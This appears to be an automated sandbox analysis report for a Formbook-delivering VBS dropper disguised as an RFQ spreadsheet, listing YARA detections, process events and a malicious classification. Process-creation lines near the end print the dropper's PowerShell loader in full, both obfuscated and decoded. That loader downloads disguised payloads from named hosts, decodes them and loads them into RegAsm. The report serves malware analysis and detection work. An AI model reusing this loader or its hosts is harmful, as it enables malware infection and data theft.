Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 03515130 appears 36 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 0354EA12 appears 84 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 034CB970 appears 266 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 03527E54 appears 88 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 0355F290 appears 105 times
Source: RFQ Order PT502818.xls.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5448
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 2044
Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2654798948.0000000000CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2654798948.0000000000CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2654798948.0000000000CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1641106278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.1641106278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1641106278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2654692262.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2654692262.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2654692262.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2654885406.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2654885406.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2654885406.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: powershell.exe PID: 7388, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7876, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: RegAsm.exe PID: 1984, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: netsh.exe PID: 4756, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.powershell.exe.2b59c690000.0.raw.unpack, SimpleZip.cs Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.powershell.exe.2b59c690000.0.raw.unpack, SimpleZip.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.powershell.exe.2b59c690000.0.raw.unpack, SimpleZip.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.expl.evad.winVBS@527/7@6/4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00E37DFA FormatMessageW,GetLastError,wprintf,GetStdHandle,LocalFree, 8_2_00E37DFA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00E38D48 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysAllocString,SysAllocString,VariantChangeType,VariantChangeType,VariantChangeType,VariantChangeType,VariantChangeType,VariantChangeType,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,CoUninitialize, 8_2_00E38D48
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6484:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nj443z3a.3iz.ps1
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ Order PT502818.xls.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RFQ Order PT502818.xls.vbs Virustotal: Detection: 13%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ Order PT502818.xls.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@H
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.mApAgbe/moc.swanozama.1-tsae-su.3s.52akel//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@H
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.mApAgbe/moc.swanozama.1-tsae-su.3s.52akel//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
